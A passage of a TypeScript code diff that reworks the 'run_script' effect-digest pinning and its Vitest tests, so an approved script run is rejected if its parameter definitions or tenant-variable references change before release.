-    const result = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+    const result = await digestFor('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
     expect(result).toMatch(/^[0-9a-f]{64}$/);
+  });
+
+  // The half the flattening `digestFor` above throws away: a release path also
+  // gets the material it can EXECUTE from, so the handler need not re-read
+  // what the digest just proved unchanged.
+  it('carries the verified run_script material alongside the digest', async () => {
+    const script = scriptRow();
+    const scope = fakeScope([{ orgId: 'org-1' }]);
+    loadScope.mockResolvedValueOnce(scope);
+    const result = await computeEffectDigestForRelease(
+      'run_script',
+      RUN_SCRIPT_ARGS,
+      runScriptDb(script).database,
+    );
+    expect(result.digest).toMatch(/^[0-9a-f]{64}$/);
+    // The SAME observation the digest was computed over — same row object,
+    // same scope object, not a re-read.
+    expect(result.context?.verifiedRunScript?.scriptRow).toBe(script);
+    expect(result.context?.verifiedRunScript?.scope).toBe(scope);
+    expect(result.context?.verifiedRunScript?.snapshot.script.id).toBe('script-1');
+  });
+
+  it('omits the context for a resolver that produced nothing reusable', async () => {
+    const pinnedButUnreusable = await computeEffectDigestForRelease(
+      'manage_organizations',
+      { action: 'update_org', orgId: 'org-1' },
+      makeFakeDb([[{ status: 'active' }]]).database,
+    );
+    expect(pinnedButUnreusable.digest).toMatch(/^[0-9a-f]{64}$/);
+    expect(pinnedButUnreusable.context).toBeUndefined();
+
+    // Unpinnable surfaces carry no context either.
+    const notApplicable = await computeEffectDigestForRelease('list_scripts', {}, makeFakeDb([]).database);
+    expect(notApplicable).toEqual({ digest: null });
   });
 });
 

--- a/apps/api/src/services/actionIntents/effectDigest.test.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.test.ts
@@ -1,5 +1,7 @@
-import { describe, expect, it, vi } from 'vitest';
+import { createHash } from 'node:crypto';
+import { beforeEach, describe, expect, it, vi } from 'vitest';
 import type { Database } from '../../db';
+import type { ResolvedVariable, TenantVariableScope } from '../tenantVariableResolution';
 import {
   computeEffectDigest,
   computeEffectDigestOutcome,
@@ -8,17 +10,44 @@ import {
 } from './effectDigest';
 
 /**
+ * The ONE seam this suite needs (#3409 PR4c-1).
+ *
+ * `run_script`'s resolver now builds the verified snapshot
+ * (`runScriptSnapshot.ts`), and that builder loads the tenant-variable scope
+ * through `loadTenantVariableScope` — the single function in this file's
+ * import graph that reaches the module-level `db` singleton. Everything else
+ * in `tenantVariableResolution` (notably `resolveForOrg` / `unreadableForOrg`,
+ * which the builder actually uses to shape the pinned references) is left
+ * REAL by the `importOriginal` spread, so this stays a seam over the loader
+ * rather than a mock of the resolution logic under test.
+ *
+ * The rest of the module's no-`vi.mock` stance is unchanged: every resolver
+ * still runs against whatever fake `Database` the test hands it.
+ */
+const { loadScope } = vi.hoisted(() => ({ loadScope: vi.fn() }));
+vi.mock('../tenantVariableResolution', async (importOriginal) => ({
+  ...(await importOriginal<typeof import('../tenantVariableResolution')>()),
+  loadTenantVariableScope: loadScope,
+}));
+
+/**
  * Generic fake `Database`: every `.select(...).from(...).where(...)` chain
  * resolves to the next array shifted off `queue`, whether the resolver calls
- * `.limit(1)` (single-row lookups) or `.orderBy(...)` (the quote-lines
- * fetch, which has no limit). Resolvers that issue N sequential queries
- * (manage_quotes:send: quote then lines; void_payment: payment then invoice)
- * consume the queue in call order — tests supply rows in that same order.
+ * `.limit(1)` (single-row lookups), `.orderBy(...)` (the quote-lines fetch,
+ * which has no limit) or awaits the chain directly (run_script's device -> org
+ * lookup, whose `inArray` already bounds the row count so a `.limit()` there
+ * would exist only to satisfy a stub). Resolvers that issue N sequential
+ * queries (manage_quotes:send: quote then lines; void_payment: payment then
+ * invoice; run_script: script then devices) consume the queue in call order —
+ * tests supply rows in that same order.
  */
 function makeFakeDb(queue: unknown[][]): { database: Database; select: ReturnType<typeof vi.fn> } {
+  const take = async () => queue.shift() ?? [];
   const chain = {
-    limit: vi.fn(async () => queue.shift() ?? []),
-    orderBy: vi.fn(async () => queue.shift() ?? []),
+    limit: vi.fn(take),
+    orderBy: vi.fn(take),
+    then: (resolve: (rows: unknown[]) => unknown, reject: (err: unknown) => unknown) =>
+      take().then(resolve, reject),
   };
   const select = vi.fn(() => ({
     from: vi.fn(() => ({
@@ -28,14 +57,60 @@ function makeFakeDb(queue: unknown[][]): { database: Database; select: ReturnTyp
   return { database: { select } as unknown as Database, select };
 }
 
-/** A full `scripts` row as the run_script resolver selects it. */
+/** A full `scripts` row as the run_script snapshot builder selects it. */
 const scriptRow = (overrides: Record<string, unknown> = {}) => ({
+  id: 'script-1',
   orgId: 'org-1',
   language: 'bash',
   content: '#!/bin/bash\necho hi',
   timeoutSeconds: 300,
   runAs: 'user',
+  parameters: null,
   ...overrides,
+});
+
+const deviceRow = (id: string, orgId: string) => ({ id, orgId });
+
+/**
+ * run_script's two-query queue, in the order the builder issues them:
+ * the script lookup, then the device -> org lookup.
+ */
+function runScriptDb(
+  script: Record<string, unknown> | null,
+  devices: Array<{ id: string; orgId: string }> = [deviceRow('device-1', 'org-1')],
+) {
+  return makeFakeDb([script === null ? [] : [script], devices]);
+}
+
+const RUN_SCRIPT_ARGS = { scriptId: 'script-1', deviceIds: ['device-1'] };
+
+const variable = (overrides: Partial<ResolvedVariable> & { key: string }): ResolvedVariable => ({
+  value: 'ordinary-value',
+  isSecret: false,
+  variableId: 'var-1',
+  version: 1,
+  ownerScope: 'organization',
+  ...overrides,
+});
+
+/**
+ * A hand-built `TenantVariableScope` carrier — duplicated from
+ * `runScriptSnapshot.test.ts` rather than shared, since it is six lines and
+ * both suites are the only readers. `loadTenantVariableScope` is the sole
+ * sanctioned constructor and it reads the module-level `db`, hence the seam
+ * above; only the DATA is faked, the production accessors still run over it.
+ */
+function fakeScope(orgs: Array<{ orgId: string; present?: ResolvedVariable[]; unreadable?: string[] }>): TenantVariableScope {
+  return {
+    orgIds: new Set(orgs.map((o) => o.orgId)),
+    byOrg: new Map(orgs.map((o) => [o.orgId, new Map((o.present ?? []).map((v) => [v.key, v]))])),
+    unreadableKeysByOrg: new Map(orgs.map((o) => [o.orgId, new Set(o.unreadable ?? [])])),
+  } as unknown as TenantVariableScope;
+}
+
+beforeEach(() => {
+  loadScope.mockReset();
+  loadScope.mockResolvedValue(fakeScope([]));
 });
 
 describe('computeEffectDigestOutcome', () => {
@@ -73,17 +148,43 @@ describe('computeEffectDigestOutcome', () => {
     });
 
     it('reports target_absent when the referenced row does not exist (deleted/typoed id)', async () => {
-      const { database } = makeFakeDb([[]]);
-      const outcome = await computeEffectDigestOutcome('run_script', { scriptId: 'ghost' }, database);
+      const { database } = runScriptDb(null);
+      const outcome = await computeEffectDigestOutcome(
+        'run_script',
+        { ...RUN_SCRIPT_ARGS, scriptId: 'ghost' },
+        database,
+      );
+      expect(outcome).toEqual({ kind: 'unresolved', reason: 'target_absent' });
+    });
+
+    // `deviceIds` is `required` in run_script's tool schema (aiToolsScripts.ts),
+    // so a call without it is MALFORMED, not a target that vanished — the same
+    // bucket a missing scriptId lands in.
+    it('reports missing_arg when deviceIds is absent, even with a valid scriptId', async () => {
+      const { database, select } = runScriptDb(scriptRow());
+      const outcome = await computeEffectDigestOutcome('run_script', { scriptId: 'script-1' }, database);
+      expect(outcome).toEqual({ kind: 'unresolved', reason: 'missing_arg' });
+      expect(select).not.toHaveBeenCalled();
+    });
+
+    // Fail closed on a device that no longer resolves: silently dropping it
+    // would shrink the pinned org set, and with it the reference set, letting
+    // a digest match while the approved fan-out no longer exists.
+    it('reports target_absent when a targeted device no longer resolves to an org', async () => {
+      const { database } = runScriptDb(scriptRow(), [deviceRow('device-1', 'org-1')]);
+      const outcome = await computeEffectDigestOutcome(
+        'run_script',
+        { scriptId: 'script-1', deviceIds: ['device-1', 'ghost-device'] },
+        database,
+      );
       expect(outcome).toEqual({ kind: 'unresolved', reason: 'target_absent' });
     });
   });
 
   describe('run_script', () => {
     it('produces the same digest for an unchanged script row', async () => {
-      const args = { scriptId: 'script-1', deviceIds: ['device-1'] };
-      const d1 = await computeEffectDigestOutcome('run_script', args, makeFakeDb([[scriptRow()]]).database);
-      const d2 = await computeEffectDigestOutcome('run_script', args, makeFakeDb([[scriptRow()]]).database);
+      const d1 = await computeEffectDigestOutcome('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+      const d2 = await computeEffectDigestOutcome('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
       expect(d1.kind).toBe('pinned');
       expect(d1).toEqual({ kind: 'pinned', digest: expect.stringMatching(/^[0-9a-f]{64}$/) });
       expect(d1).toEqual(d2);
@@ -100,15 +201,152 @@ describe('computeEffectDigestOutcome', () => {
       ['timeoutSeconds', { timeoutSeconds: 9000 }],
       ['orgId', { orgId: 'org-2' }],
     ])('changes the digest when %s changes', async (_field, mutation) => {
-      const args = { scriptId: 'script-1', deviceIds: ['device-1'] };
-      const before = await computeEffectDigest('run_script', args, makeFakeDb([[scriptRow()]]).database);
+      const before = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
       const after = await computeEffectDigest(
         'run_script',
-        args,
-        makeFakeDb([[scriptRow(mutation)]]).database,
+        RUN_SCRIPT_ARGS,
+        runScriptDb(scriptRow(mutation)).database,
       );
       expect(before).not.toBeNull();
       expect(before).not.toBe(after);
+    });
+
+    /**
+     * #3409 PR4c-1 — the digest is now built from the VERIFIED SNAPSHOT
+     * (runScriptSnapshot.ts), so it pins the parameter definitions and a
+     * reference to every tenant variable the run will consult, not just the
+     * five script fields above.
+     *
+     * The TOCTOU these close: an approved run can be rebound to a different
+     * variable (parameter `variableKey` edited), or have the variable it
+     * resolves rotated / shadowed by an org override / reclassified secret /
+     * deleted — all with a byte-identical script body, and all previously
+     * invisible to the digest.
+     *
+     * These go end to end through computeEffectDigestOutcome deliberately:
+     * runScriptSnapshot.test.ts already proves the MATERIAL is drift-sensitive,
+     * but that says nothing about whether the resolver is wired to it.
+     */
+    describe('tenant-variable and parameter-definition pinning', () => {
+      const content = 'echo {{var.api_token}}';
+      const definitions = [
+        { name: 'token', type: 'string', source: 'tenantVariable', variableKey: 'api_token' },
+      ];
+      const baselineScope = (overrides: Partial<ResolvedVariable> = {}) =>
+        fakeScope([
+          {
+            orgId: 'org-1',
+            present: [variable({ key: 'api_token', variableId: 'var-a', version: 3, ...overrides })],
+          },
+        ]);
+
+      /** One pinning pass: the scope the loader returns + the script row on disk. */
+      async function digestOf(
+        scope: TenantVariableScope,
+        script: Record<string, unknown> = scriptRow({ content, parameters: definitions }),
+        devices: Array<{ id: string; orgId: string }> = [deviceRow('device-1', 'org-1')],
+      ): Promise<string | null> {
+        loadScope.mockResolvedValueOnce(scope);
+        return computeEffectDigest(
+          'run_script',
+          { scriptId: 'script-1', deviceIds: devices.map((d) => d.id) },
+          runScriptDb(script, devices).database,
+        );
+      }
+
+      it('pins a digest at all for a variable-referencing script, and it is stable', async () => {
+        const before = await digestOf(baselineScope());
+        const after = await digestOf(baselineScope());
+        expect(before).toMatch(/^[0-9a-f]{64}$/);
+        expect(before).toBe(after);
+        expect(loadScope).toHaveBeenCalledWith(['org-1']);
+      });
+
+      it.each<[string, () => Promise<string | null>]>([
+        ['the variable version is rotated', () => digestOf(baselineScope({ version: 4 }))],
+        ['isSecret is flipped false -> true', () => digestOf(baselineScope({ isSecret: true }))],
+        [
+          'an org override shadows a partner-wide row (same key and value, different variableId)',
+          () => digestOf(baselineScope({ variableId: 'var-override' })),
+        ],
+        ['the variable is deleted (present -> absent)', () => digestOf(fakeScope([{ orgId: 'org-1' }]))],
+        [
+          'the variable can no longer be decrypted (present -> unreadable)',
+          () => digestOf(fakeScope([{ orgId: 'org-1', unreadable: ['api_token'] }])),
+        ],
+        [
+          "a parameter's variableKey is rebound to a different variable",
+          () =>
+            digestOf(
+              baselineScope(),
+              scriptRow({
+                content,
+                parameters: [
+                  { name: 'token', type: 'string', source: 'tenantVariable', variableKey: 'other_token' },
+                ],
+              }),
+            ),
+        ],
+        [
+          'a parameter definition is added',
+          () =>
+            digestOf(
+              baselineScope(),
+              scriptRow({
+                content,
+                parameters: [...definitions, { name: 'level', type: 'string', source: 'runtime' }],
+              }),
+            ),
+        ],
+        [
+          'a parameter definition is removed',
+          () => digestOf(baselineScope(), scriptRow({ content, parameters: [] })),
+        ],
+        [
+          'the targeted device moved to another org (the variable resolves elsewhere)',
+          () =>
+            digestOf(
+              fakeScope([
+                { orgId: 'org-2', present: [variable({ key: 'api_token', variableId: 'var-a', version: 3 })] },
+              ]),
+              scriptRow({ content, parameters: definitions }),
+              [deviceRow('device-1', 'org-2')],
+            ),
+        ],
+      ])('changes the digest when %s', async (_case, drifted) => {
+        const baseline = await digestOf(baselineScope());
+        expect(baseline).not.toBeNull();
+        expect(baseline).not.toBe(await drifted());
+      });
+
+      // A digest pinned BEFORE this change hashed a bare five-field object.
+      // The v:2 envelope guarantees the recomputed value can never coincide
+      // with it, so a pre-PR4c intent fails closed (`content_changed`) at
+      // release instead of silently comparing equal against a narrower pin.
+      it('can never collide with a v1 (five-field) digest pinned before PR4c', async () => {
+        const v1 = createHash('sha256')
+          .update(
+            JSON.stringify({
+              orgId: 'org-1',
+              language: 'bash',
+              content: '#!/bin/bash\necho hi',
+              timeoutSeconds: 300,
+              runAs: 'user',
+            }),
+          )
+          .digest('hex');
+        const v2 = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+        expect(v2).toMatch(/^[0-9a-f]{64}$/);
+        expect(v2).not.toBe(v1);
+      });
+
+      // The overwhelming majority of scripts reference nothing, and must not
+      // pay for a variable query at intent creation.
+      it('loads no variable scope for a script that references none', async () => {
+        const digest = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+        expect(digest).toMatch(/^[0-9a-f]{64}$/);
+        expect(loadScope).toHaveBeenCalledWith([]);
+      });
     });
   });
 
@@ -360,15 +598,15 @@ describe('computeEffectDigest (flattening wrapper the release paths use)', () =>
   it('flattens BOTH unpinnable outcomes to null, which is what the stored column can express', async () => {
     expect(await computeEffectDigest('list_scripts', {}, makeFakeDb([]).database)).toBeNull();
     expect(await computeEffectDigest('run_script', {}, makeFakeDb([]).database)).toBeNull();
-    expect(await computeEffectDigest('run_script', { scriptId: 'ghost' }, makeFakeDb([[]]).database)).toBeNull();
+    // A genuine target_absent (not another missing_arg): well-formed args, no
+    // script row. Both reasons still flatten to the same stored NULL.
+    expect(
+      await computeEffectDigest('run_script', { ...RUN_SCRIPT_ARGS, scriptId: 'ghost' }, runScriptDb(null).database),
+    ).toBeNull();
   });
 
   it('returns the digest itself on pinned', async () => {
-    const result = await computeEffectDigest(
-      'run_script',
-      { scriptId: 'script-1' },
-      makeFakeDb([[scriptRow()]]).database,
-    );
+    const result = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
     expect(result).toMatch(/^[0-9a-f]{64}$/);
   });
 });

--- a/apps/api/src/services/actionIntents/effectDigest.test.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.test.ts
@@ -240,6 +240,12 @@ describe('computeEffectDigestOutcome', () => {
           },
         ]);
 
+      // Task 3b (#3409 PR4c-1): `digestOf` now records the exact `database`
+      // it handed `computeEffectDigest`, so the pinning test below can assert
+      // `loadScope` (== `loadTenantVariableScope`) was called with THAT SAME
+      // connection reused — not a second, freshly-escaped one.
+      let lastDatabase: Database;
+
       /** One pinning pass: the scope the loader returns + the script row on disk. */
       async function digestOf(
         scope: TenantVariableScope,
@@ -247,19 +253,24 @@ describe('computeEffectDigestOutcome', () => {
         devices: Array<{ id: string; orgId: string }> = [deviceRow('device-1', 'org-1')],
       ): Promise<string | null> {
         loadScope.mockResolvedValueOnce(scope);
+        lastDatabase = runScriptDb(script, devices).database;
         return computeEffectDigest(
           'run_script',
           { scriptId: 'script-1', deviceIds: devices.map((d) => d.id) },
-          runScriptDb(script, devices).database,
+          lastDatabase,
         );
       }
 
       it('pins a digest at all for a variable-referencing script, and it is stable', async () => {
         const before = await digestOf(baselineScope());
+        // Task 3b: the digest path reuses the ambient connection rather than
+        // acquiring a second pooled one — `loadTenantVariableScope` is called
+        // with `{ database }` (the SAME database this call was handed),
+        // never bare `orgIds` alone.
+        expect(loadScope).toHaveBeenCalledWith(['org-1'], { database: lastDatabase });
         const after = await digestOf(baselineScope());
         expect(before).toMatch(/^[0-9a-f]{64}$/);
         expect(before).toBe(after);
-        expect(loadScope).toHaveBeenCalledWith(['org-1']);
       });
 
       it.each<[string, () => Promise<string | null>]>([
@@ -343,9 +354,10 @@ describe('computeEffectDigestOutcome', () => {
       // The overwhelming majority of scripts reference nothing, and must not
       // pay for a variable query at intent creation.
       it('loads no variable scope for a script that references none', async () => {
-        const digest = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, runScriptDb(scriptRow()).database);
+        const database = runScriptDb(scriptRow()).database;
+        const digest = await computeEffectDigest('run_script', RUN_SCRIPT_ARGS, database);
         expect(digest).toMatch(/^[0-9a-f]{64}$/);
-        expect(loadScope).toHaveBeenCalledWith([]);
+        expect(loadScope).toHaveBeenCalledWith([], { database });
       });
     });
   });

--- a/apps/api/src/services/actionIntents/effectDigest.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.ts
@@ -2,9 +2,10 @@ import { createHash } from 'node:crypto';
 import { and, eq, isNull } from 'drizzle-orm';
 import type { Database } from '../../db';
 import {
-  scripts, quotes, quoteLines, invoices, invoicePayments, contracts, organizations,
+  quotes, quoteLines, invoices, invoicePayments, contracts, organizations,
   tickets, drPlans, partners,
 } from '../../db/schema';
+import { buildRunScriptSnapshot, runScriptDigestMaterial } from './runScriptSnapshot';
 
 /**
  * Effect-digest pinning for tier-3 action intents (spec
@@ -111,44 +112,53 @@ const EFFECT_DIGEST_RESOLVERS: Record<
   // on four_eyes). Pins every field that changes WHAT ACTUALLY EXECUTES, not
   // just the body: `content` alone left `run_as` free to be flipped from
   // `user` to `system` between approval and release with a byte-identical
-  // digest. The pinned set mirrors exactly what aiToolsScripts.ts's
-  // run_script handler reads off the row and forwards to the agent
-  // (language / content / timeoutSeconds / runAs), plus `orgId`, which the
-  // handler uses for its org-equality invariant against the target device.
+  // digest.
   //
-  // `scripts.parameters` (the jsonb column) is deliberately NOT pinned: the
-  // handler passes `input.parameters ?? {}` from the tool call, never the
-  // column, so the column has no effect on execution and pinning it would
-  // manufacture spurious `content_changed` failures.
+  // The pinned set — and the reads that produce it — live in
+  // runScriptSnapshot.ts rather than inline here: #3409 PR4c-1 makes the
+  // digest and dispatch derivable from ONE observation instead of two copies
+  // free to drift apart (the release side consumes the snapshot's scope; this
+  // creation-side call needs only the material).
+  // `runScriptDigestMaterial` is a `v: 2` envelope, so a digest pinned before
+  // this change can never compare equal to a recomputed one: a pre-PR4c
+  // intent fails closed at release rather than revalidating against a
+  // narrower pin.
+  //
+  // `scripts.parameters` (the jsonb column) IS pinned, reversing the earlier
+  // exclusion. That exclusion rested on "the handler passes
+  // `input.parameters ?? {}` from the tool call, never the column, so the
+  // column has no effect on execution" — TRUE before #3409 PR3, FALSE since:
+  // the column now drives `scriptNeedsVariableScope` and every per-parameter
+  // `tenantVariable` binding at scriptDispatch.ts. Rebinding a parameter to a
+  // different variable changes what the device runs with a byte-identical
+  // script body, so the column is exactly the kind of drift this module
+  // exists to catch. Pinned through the canonical serializer
+  // (`canonicalizeScriptParameterDefinitions`), which is schema-normalized and
+  // object-key-order independent — a jsonb round trip or a legacy
+  // `{name,type}` gaining its materialized defaults is NOT a change, so the
+  // spurious-`content_changed` worry the old comment raised does not survive
+  // the canonicalization either.
+  //
+  // The variables themselves are pinned by REFERENCE (variableId + version +
+  // isSecret + ownerScope, per (org, key)) and never by value —
+  // `effect_digest` is widely readable and must not be reconstructible into
+  // tenant plaintext.
   //
   // Filtered to non-deleted scripts, mirroring the handler — a script
   // soft-deleted after approval resolves to `target_absent` here too, which
   // correctly mismatches against the digest pinned at creation (the release
   // fails closed instead of trying to run a deleted script).
   run_script: async (args, database) => {
-    const scriptId = typeof args.scriptId === 'string' ? args.scriptId : null;
-    if (!scriptId) return MISSING_ARG;
-    const [script] = await database
-      .select({
-        orgId: scripts.orgId,
-        language: scripts.language,
-        content: scripts.content,
-        timeoutSeconds: scripts.timeoutSeconds,
-        runAs: scripts.runAs,
-      })
-      .from(scripts)
-      .where(and(eq(scripts.id, scriptId), isNull(scripts.deletedAt)))
-      .limit(1);
-    if (!script) return TARGET_ABSENT;
-    return material(
-      JSON.stringify({
-        orgId: script.orgId ?? null,
-        language: script.language,
-        content: script.content,
-        timeoutSeconds: script.timeoutSeconds,
-        runAs: script.runAs,
-      }),
-    );
+    const built = await buildRunScriptSnapshot(args, database);
+    if (built.kind === 'missing_arg') return MISSING_ARG;
+    if (built.kind === 'target_absent') return TARGET_ABSENT;
+    // `built.scope` (plaintext-bearing) is deliberately dropped: this path
+    // only needs the digest, and this map's `ResolverResult` has nowhere to
+    // put a scope. Keeping it is the release side's job — see
+    // buildRunScriptSnapshot's `{ snapshot, scope }` return, which lets a
+    // caller that also DISPATCHES reuse the exact scope the digest was
+    // checked against rather than re-resolving it.
+    return material(runScriptDigestMaterial(built.snapshot));
   },
 
   // manage_quotes:send: pin the quote's revision (updated_at) plus a
@@ -341,9 +351,17 @@ export function effectDigestResolverKey(toolName: string, action?: string): stri
  * passing that SAME singleton reference is what makes "compute inside the
  * creation transaction" work — the digest read lands on whatever transaction
  * the caller currently has open, without this module needing to import
- * '../../db' (and its real Postgres client construction) itself. That keeps
- * this module — and effectDigest.test.ts — free of any dependency on a
- * live/mocked database module; tests just pass a fake `database`.
+ * '../../db' (and its real Postgres client construction) itself. Tests just
+ * pass a fake `database`.
+ *
+ * ONE EXCEPTION since #3409 PR4c-1: run_script's snapshot loads the tenant-
+ * variable scope through `loadTenantVariableScope`, which deliberately does
+ * NOT ride the caller's transaction (it elevates to a fresh system context —
+ * see tenantVariableResolution.ts for why resolution must not depend on which
+ * of the five dispatch call sites is ambient) and therefore reads the module-
+ * level `db`. So this module's import graph now reaches '../../db'
+ * transitively, and effectDigest.test.ts seams that ONE function. Everything
+ * else still resolves purely against the injected `database`.
  */
 export async function computeEffectDigestOutcome(
   toolName: string,

--- a/apps/api/src/services/actionIntents/effectDigest.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.ts
@@ -381,12 +381,15 @@ export function effectDigestResolverKey(toolName: string, action?: string): stri
  * connection-hold class. Reusing the caller's connection is sound only because
  * every call site of this module is already system-scoped, which is the
  * caller obligation `opts.database` carries and `loadTenantVariableScope`
- * asserts on entry.
+ * checks inside its `opts.database` branch — note that branch sits AFTER the
+ * empty-`orgIds` short-circuit, so a script referencing no variables never
+ * reaches the check (it issues no query either, so there is nothing to scope).
  *
  * The import graph therefore still reaches '../../db' transitively (through
- * tenantVariableResolution), and effectDigest.test.ts seams that ONE function
- * so the unit suite needs no database module at all. Everything else still
- * resolves purely against the injected `database`.
+ * tenantVariableResolution), and effectDigest.test.ts seams that ONE function.
+ * The seam does not avoid LOADING the db module — `importOriginal()` loads it
+ * — it avoids needing a live database and a real system-scoped context behind
+ * it. Everything else still resolves purely against the injected `database`.
  */
 export async function computeEffectDigestOutcome(
   toolName: string,

--- a/apps/api/src/services/actionIntents/effectDigest.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.ts
@@ -128,8 +128,9 @@ const EFFECT_DIGEST_RESOLVERS: Record<
   // The pinned set — and the reads that produce it — live in
   // runScriptSnapshot.ts rather than inline here: #3409 PR4c-1 makes the
   // digest and dispatch derivable from ONE observation instead of two copies
-  // free to drift apart (the release side will consume the snapshot's scope;
-  // this creation-side call needs only the material).
+  // free to drift apart (the release side consumes the snapshot's scope —
+  // `computeEffectDigestForRelease` carries it to dispatch; this creation-side
+  // call needs only the material).
   // `runScriptDigestMaterial` is a `v: 2` envelope, so a digest pinned before
   // this change can never compare equal to a recomputed one: a pre-PR4c
   // intent fails closed at release rather than revalidating against a
@@ -369,14 +370,23 @@ export function effectDigestResolverKey(toolName: string, action?: string): stri
  * '../../db' (and its real Postgres client construction) itself. Tests just
  * pass a fake `database`.
  *
- * ONE EXCEPTION since #3409 PR4c-1: run_script's snapshot loads the tenant-
- * variable scope through `loadTenantVariableScope`, which deliberately does
- * NOT ride the caller's transaction (it elevates to a fresh system context —
- * see tenantVariableResolution.ts for why resolution must not depend on which
- * of the five dispatch call sites is ambient) and therefore reads the module-
- * level `db`. So this module's import graph now reaches '../../db'
- * transitively, and effectDigest.test.ts seams that ONE function. Everything
- * else still resolves purely against the injected `database`.
+ * ONE NUANCE since #3409 PR4c-1 (Task 3b): run_script's snapshot loads the
+ * tenant-variable scope through `loadTenantVariableScope`, and hands it THIS
+ * SAME `database` as `opts.database` so the load rides the caller's connection
+ * too. `loadTenantVariableScope`'s default path deliberately escapes to a
+ * genuinely fresh system context (see tenantVariableResolution.ts for why
+ * resolution must not depend on which of the five DISPATCH call sites is
+ * ambient); taking that escape here would acquire a SECOND pooled connection
+ * while the creation transaction still holds the first — the #1105
+ * connection-hold class. Reusing the caller's connection is sound only because
+ * every call site of this module is already system-scoped, which is the
+ * caller obligation `opts.database` carries and `loadTenantVariableScope`
+ * asserts on entry.
+ *
+ * The import graph therefore still reaches '../../db' transitively (through
+ * tenantVariableResolution), and effectDigest.test.ts seams that ONE function
+ * so the unit suite needs no database module at all. Everything else still
+ * resolves purely against the injected `database`.
  */
 export async function computeEffectDigestOutcome(
   toolName: string,
@@ -415,36 +425,25 @@ async function resolveEffectDigest(
   };
 }
 
-/**
- * Flattening wrapper: the pinned digest, or null for BOTH unpinnable outcomes.
- *
- * This is the shape the two RELEASE paths want and must keep — they compare
- * the recomputed value against the stored column, where `not_applicable` and
- * `unresolved` are indistinguishable by construction (both stored NULL). Only
- * the CREATION path (intentService.ts) uses computeEffectDigestOutcome, since
- * it is the only caller that can still observe the distinction.
- */
-export async function computeEffectDigest(
-  toolName: string,
-  args: Record<string, unknown>,
-  database: Database,
-): Promise<string | null> {
-  const outcome = await computeEffectDigestOutcome(toolName, args, database);
-  return outcome.kind === 'pinned' ? outcome.digest : null;
-}
-
 /** What a release path gets back: the digest to compare, and — when the
  *  resolver produced one — the verified material to EXECUTE from. */
 export type EffectDigestReleaseResult = {
-  /** Same value `computeEffectDigest` returns, for the same comparison. */
+  /**
+   * The pinned digest, or null for BOTH unpinnable outcomes. Flattened
+   * deliberately: a release path compares this against the stored column,
+   * where `not_applicable` and `unresolved` are indistinguishable by
+   * construction (both stored NULL). Only the CREATION path
+   * (`computeEffectDigestOutcome`, used by intentService.ts) can still observe
+   * the distinction, and it is the only caller that needs to.
+   */
   digest: string | null;
   /** Absent unless the resolver resolved something a handler can reuse. */
   context?: ToolExecutionContext;
 };
 
 /**
- * The RELEASE-path recompute (#3409 PR4c-1) — `computeEffectDigest`'s sibling,
- * not its replacement.
+ * The RELEASE-path recompute (#3409 PR4c-1) — the sibling of
+ * `computeEffectDigestOutcome`, which stays the CREATION path.
  *
  * Both release paths (jobs/intentReleaseWorker.ts and the inline chat release
  * in services/aiAgentSdk.ts) already read the target in order to recompute the
@@ -454,10 +453,10 @@ export type EffectDigestReleaseResult = {
  * unchanged could change between the comparison and the handler's own query.
  *
  * So this returns the digest AND the resolved material, and the caller hands
- * the latter to `executeTool` as its `ToolExecutionContext`. A caller that
- * ignores `context` behaves exactly as `computeEffectDigest` — which is why
- * that flattener keeps its `string | null` signature for every non-release
- * caller rather than being widened.
+ * the latter to `executeTool` as its `ToolExecutionContext`. `context` is
+ * optional: a caller that ignores it gets exactly the digest comparison and
+ * nothing else, so a release path that has no handler to feed (or a tool with
+ * no reusable material) needs no separate entry point.
  *
  * The context is returned even on a MISMATCH (the digest is what decides), so
  * a caller must compare first and only then dispatch. Both call sites fail

--- a/apps/api/src/services/actionIntents/effectDigest.ts
+++ b/apps/api/src/services/actionIntents/effectDigest.ts
@@ -6,6 +6,7 @@ import {
   tickets, drPlans, partners,
 } from '../../db/schema';
 import { buildRunScriptSnapshot, runScriptDigestMaterial } from './runScriptSnapshot';
+import type { ToolExecutionContext, VerifiedRunScript } from '../toolExecutionContext';
 
 /**
  * Effect-digest pinning for tier-3 action intents (spec
@@ -82,7 +83,17 @@ import { buildRunScriptSnapshot, runScriptDigestMaterial } from './runScriptSnap
  * mean "nothing to pin", but for reasons the caller must be able to tell
  * apart (see the DESIGN CHOICE note above). */
 type ResolverResult =
-  | { kind: 'material'; material: string | Buffer }
+  | {
+      kind: 'material';
+      material: string | Buffer;
+      /**
+       * What the resolver ALREADY resolved in order to produce `material`,
+       * for a release path to hand to the tool handler instead of making it
+       * read the same rows again (#3409 PR4c-1). Only `run_script` sets it;
+       * the creation path drops it (see `computeEffectDigestOutcome`).
+       */
+      verified?: VerifiedRunScript;
+    }
   | { kind: 'missing_arg' }
   | { kind: 'target_absent' };
 
@@ -152,13 +163,17 @@ const EFFECT_DIGEST_RESOLVERS: Record<
     const built = await buildRunScriptSnapshot(args, database);
     if (built.kind === 'missing_arg') return MISSING_ARG;
     if (built.kind === 'target_absent') return TARGET_ABSENT;
-    // `built.scope` (plaintext-bearing) is deliberately dropped: this path
-    // only needs the digest, and this map's `ResolverResult` has nowhere to
-    // put a scope. Keeping it is the release side's job — see
-    // buildRunScriptSnapshot's `{ snapshot, scope }` return, which lets a
-    // caller that also DISPATCHES reuse the exact scope the digest was
-    // checked against rather than re-resolving it.
-    return material(runScriptDigestMaterial(built.snapshot));
+    // The three siblings ride along as `verified` so a caller that also
+    // DISPATCHES can execute from the SAME observation the digest was
+    // computed over — the scope in particular, whose re-resolution is the
